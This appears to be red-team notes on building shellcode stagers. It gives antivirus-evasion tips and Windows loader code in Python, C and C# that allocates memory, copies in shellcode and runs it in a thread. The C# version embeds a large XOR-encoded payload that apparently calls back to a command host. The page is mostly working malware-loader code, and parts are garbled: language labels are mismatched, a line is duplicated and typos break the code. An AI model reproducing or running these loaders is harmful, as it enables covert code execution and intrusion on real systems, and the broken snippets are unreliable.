Stagers
Stagers:
Stagers general:
allocate memory (length of shellcode) to inject into memory
Once memory has been allocated - write the shellcode into memory
create a thread that executed the shellcode written into the current process (ensuring when the process injected into doesn't die)
keep current process running until the thread (beacon session) exits
Stagers function calls:
VirtualAlloc- Allocates memoryRtlMoveMemory- Copies shellcode into space allocated by VirtualAlloc callCreateThreat- Creates threat that executed shellcodeWaitForSingleObject- Tells program to wait until threate created exists before closing
potential AV catch points:
allocating memory with RWX (ReadWriteExecute) (hex: 0x40) (hex:0x04 RW) (https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants)
looking for function calls that use them three in quick sucessions
don't compile using Linux/mingw/Wine
Basic stagers:
Only need RWX if you're using an encoded shellcode. Stage_encoding can occur OTW
import ctypes
shellcode = b"BUFFER_SHELLCODE"
allocated_memory = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x300),ctypes.c_int(0x04))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(allocated_memory),shellcode,ctypes.c_int(len(shellcode)))
changed_protections = ctypes.windll.kernel32.VirtualProtect(ctypes.c_int(allocated_memory),ctypes.c_int(len(shellcode)),ctypes.c_int(0x10),ctypes.byref(ctypes.c_unint32(0)))
thread_running_shellcode = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctpyes.c_int(0),ctpyes.c_int(allocated_memory),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread_running_shellcode),ctypes.c_int(-1))C#:
#include <windows.h>
#include <stdio.h>
#include <string.h>
int main()
{
LPVOID lpvAddr;
HANDLE hHand;
DWORD dwWaitResult;
DWORD threadID;
unsigned char buff[] = "BUFFER_SHELLCODE";
lpvAddr = VirtualAlloc(Null, strlen(buff),0x3000,0x40);
RtlMoveMemory(lpvAddr, buff, strlen(buff));
hHand = CreateThread(NULL, 0, lpvaddr, NULL, 0, &ThreadID);
dwWaitResult = WaitForSingleObject(hHand, INFINITE);
return 0
}c++:
using system; using System.Net; using System.Net.Sockets; using System.Runting.InteropServices; using System.Threading;
namespace slksdf { class ajksnlksdf { [DllImport("Kernel32")] private static extern UInt32 HeapCreate(UInt32 HeapCreate1,UInt32 HeapCreate2, UInt32 HeapCreate3);
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
namespace slksdf
{
class ajksnlksdf
{
[DllImport("Kernel32")]
private static extern UInt32 HeapCreate(UInt32 HeapCreate1, UInt32 HeapCreate2, UInt32 HeapCreate3);
[DllImport("Kernel32")]
private static extern UInt32 HeapAlloc(UInt32 HeapAlloc1, UInt32 HeapAlloc2, UInt32 HeapAlloc3);
[DllImport("Kernel32")]
private static extern UInt32 RtlMoveMemory(UInt32 RtlMoveMemory1, byte[] RtlMoveMemoryByte, UInt32 RtlMoveMemory3);
[DllImport("Kernel32")]
private static extern IntPtr CreateThread(UInt32 CreateThread1, UInt32 CreateThread2, UInt32 CreateThread3, IntPtr CreateThread4, UInt32 CreateThread5, ref UInt32 CreateThread6);
[DllImport("Kernel32")]
private static extern IntPtr WaitForSingleObject(IntPtr WaitForSingleObject1, UInt32 WaitForSingleObject2);
static void Main()
{
byte[] BYTE = { 0x94, 0x20, 0xeb, 0x8c, 0x98, 0x80, 0xa4, 0x68, 0x68, 0x68, 0x29, 0x39, 0x29, 0x38, 0x3a, 0x39, 0x3e, 0x20, 0x59, 0xba, 0x0d, 0x20, 0xe3, 0x3a, 0x08, 0x20, 0xe3, 0x3a, 0x70, 0x20, 0xe3, 0x3a, 0x48, 0x20, 0x67, 0xdf, 0x22, 0x22, 0x25, 0x59, 0xa1, 0x20, 0xe3, 0x1a, 0x38, 0x20, 0x59, 0xa8, 0xc4, 0x54, 0x09, 0x14, 0x6a, 0x44, 0x48, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x8a, 0x85, 0x3a, 0x29, 0x39, 0x20, 0xe3, 0x3a, 0x48, 0xe3, 0x2a, 0x54, 0x20, 0x69, 0xb8, 0x0e, 0xe9, 0x10, 0x70, 0x63, 0x6a, 0x67, 0xed, 0x1a, 0x68, 0x68, 0x68, 0xe3, 0xe8, 0xe0, 0x68, 0x68, 0x68, 0x20, 0xed, 0xa8, 0x1c, 0x0f, 0x20, 0x69, 0xb8, 0x38, 0xe3, 0x20, 0x70, 0x2c, 0xe3, 0x28, 0x48, 0x21, 0x69, 0xb8, 0x8b, 0x3e, 0x20, 0x97, 0xa1, 0x29, 0xe3, 0x5c, 0xe0, 0x20, 0x69, 0xbe, 0x25, 0x59, 0xa1, 0x20, 0x59, 0xa8, 0xc4, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x50, 0x88, 0x1d, 0x99, 0x24, 0x6b, 0x24, 0x4c, 0x60, 0x2d, 0x51, 0xb9, 0x1d, 0xb0, 0x30, 0x2c, 0xe3, 0x28, 0x4c, 0x21, 0x69, 0xb8, 0x0e, 0x29, 0xe3, 0x64, 0x20, 0x2c, 0xe3, 0x28, 0x74, 0x21, 0x69, 0xb8, 0x29, 0xe3, 0x6c, 0xe0, 0x20, 0x69, 0xb8, 0x29, 0x30, 0x29, 0x30, 0x36, 0x31, 0x32, 0x29, 0x30, 0x29, 0x31, 0x29, 0x32, 0x20, 0xeb, 0x84, 0x48, 0x29, 0x3a, 0x97, 0x88, 0x30, 0x29, 0x31, 0x32, 0x20, 0xe3, 0x7a, 0x81, 0x23, 0x97, 0x97, 0x97, 0x35, 0x20, 0x59, 0xb3, 0x3b, 0x21, 0xd6, 0x1f, 0x01, 0x06, 0x01, 0x06, 0x0d, 0x1c, 0x68, 0x29, 0x3e, 0x20, 0xe1, 0x89, 0x21, 0xaf, 0xaa, 0x24, 0x1f, 0x4e, 0x6f, 0x97, 0xbd, 0x3b, 0x3b, 0x20, 0xe1, 0x89, 0x3b, 0x32, 0x25, 0x59, 0xa8, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xd2, 0x52, 0x3e, 0x11, 0xcf, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0x67, 0x68, 0x68, 0x68, 0x59, 0x51, 0x5a, 0x46, 0x59, 0x5e, 0x50, 0x46, 0x5d, 0x51, 0x46, 0x59, 0x5b, 0x5b, 0x68, 0x32, 0x20, 0xe1, 0xa9, 0x21, 0xaf, 0xa8, 0x28, 0x77, 0x68, 0x68, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x02, 0x6b, 0x3b, 0x21, 0xd2, 0x3f, 0xe1, 0xf7, 0xae, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0xa2, 0x68, 0x68, 0x68, 0x47, 0x3b, 0x51, 0x09, 0x3b, 0x58, 0x07, 0x02, 0x5c, 0x37, 0x12, 0x5b, 0x0b, 0x3f, 0x51, 0x59, 0x32, 0x1d, 0x2f, 0x09, 0x1f, 0x22, 0x39, 0x22, 0x31, 0x30, 0x0e, 0x26, 0x1f, 0x09, 0x09, 0x31, 0x00, 0x0f, 0x3a, 0x1a, 0x1b, 0x10, 0x3d, 0x12, 0x24, 0x26, 0x37, 0x02, 0x3e, 0x05, 0x32, 0x59, 0x5f, 0x12, 0x27, 0x2b, 0x0b, 0x05, 0x31, 0x0b, 0x59, 0x02, 0x5c, 0x18, 0x51, 0x11, 0x5e, 0x24, 0x1d, 0x21, 0x09, 0x2c, 0x12, 0x2f, 0x10, 0x1d, 0x19, 0x23, 0x45, 0x18, 0x5c, 0x32, 0x2f, 0x00, 0x23, 0x39, 0x0a, 0x0d, 0x1e, 0x32, 0x1e, 0x5b, 0x3c, 0x5f, 0x24, 0x20, 0x0c, 0x27, 0x1f, 0x31, 0x38, 0x19, 0x06, 0x2c, 0x58, 0x3a, 0x23, 0x12, 0x2f, 0x0e, 0x58, 0x38, 0x2a, 0x07, 0x58, 0x0b, 0x3c, 0x30, 0x06, 0x27, 0x20, 0x39, 0x24, 0x12, 0x31, 0x1e, 0x1b, 0x0f, 0x03, 0x1e, 0x18, 0x3e, 0x27, 0x04, 0x38, 0x2a, 0x3b, 0x21, 0x3e, 0x32, 0x3e, 0x0a, 0x02, 0x02, 0x1e, 0x3b, 0x3c, 0x3b, 0x19, 0x04, 0x2e, 0x5f, 0x03, 0x03, 0x3e, 0x06, 0x0d, 0x0d, 0x21, 0x45, 0x30, 0x38, 0x2f, 0x32, 0x01, 0x32, 0x29, 0x11, 0x0e, 0x51, 0x32, 0x31, 0x26, 0x05, 0x06, 0x05, 0x59, 0x59, 0x1f, 0x2a, 0x02, 0x1c, 0x0a, 0x5e, 0x10, 0x19, 0x5a, 0x0c, 0x1c, 0x27, 0x26, 0x3f, 0x3a, 0x5d, 0x5f, 0x2c, 0x2c, 0x0e, 0x11, 0x18, 0x10, 0x59, 0x24, 0x30, 0x04, 0x68, 0x20, 0xe1, 0xa9, 0x3b, 0x32, 0x29, 0x30, 0x25, 0x59, 0xa1, 0x3b, 0x20, 0xd0, 0x68, 0x6a, 0x40, 0xec, 0x68, 0x68, 0x68, 0x68, 0x38, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x83, 0x3d, 0x46, 0x53, 0x97, 0xbd, 0x20, 0xe1, 0xae, 0x02, 0x62, 0x37, 0x3b, 0x32, 0x20, 0xe1, 0x99, 0x25, 0x59, 0xa1, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x45, 0x6e, 0x70, 0x13, 0x97, 0xbd, 0xed, 0xa8, 0x1d, 0x77, 0x20, 0xaf, 0xa9, 0xe0, 0x7b, 0x68, 0x68, 0x21, 0xd2, 0x2c, 0x98, 0x5d, 0x88, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0x97, 0xa7, 0x1c, 0x6a, 0x83, 0xa4, 0x80, 0x3d, 0x68, 0x68, 0x68, 0x3b, 0x31, 0x02, 0x28, 0x32, 0x21, 0xe1, 0xb9, 0xa9, 0x8a, 0x78, 0x21, 0xaf, 0xa8, 0x68, 0x78, 0x68, 0x68, 0x21, 0xd2, 0x30, 0xcc, 0x3b, 0x8d, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xfb, 0x3b, 0x3b, 0x20, 0xe1, 0x8f, 0x20, 0xe1, 0x99, 0x20, 0xe1, 0xb2, 0x21, 0xaf, 0xa8, 0x68, 0x48, 0x68, 0x68, 0x21, 0xe1, 0x91, 0x21, 0xd2, 0x7a, 0xfe, 0xe1, 0x8a, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xeb, 0xac, 0x48, 0xed, 0xa8, 0x1c, 0xda, 0x0e, 0xe3, 0x6f, 0x20, 0x69, 0xab, 0xed, 0xa8, 0x1d, 0xba, 0x30, 0xab, 0x30, 0x02, 0x68, 0x31, 0x21, 0xaf, 0xaa, 0x98, 0xdd, 0xca, 0x3e, 0x97, 0xbd };
for (int i = 0; i < BYTE.Length; i++)
{
BYTE[i] = (byte)(BYTE[i] ^ (byte)'h');
}
UInt32 CreateHeap = HeapCreate(0x00040000, (UInt32)BYTE.Length, 0);
UInt32 AllocHeap = HeapAlloc(CreateHeap, 0x00000008, (UInt32)BYTE.Length);
RtlMoveMemory(AllocHeap, BYTE, (UInt32)BYTE.Length);
UInt32 Zero = 0;
IntPtr ThreadCreate = CreateThread(0, 0, AllocHeap, IntPtr.Zero, 0, ref Zero);
WaitForSingleObject(ThreadCreate, 0xFFFFFFF);
}
}
}Last updated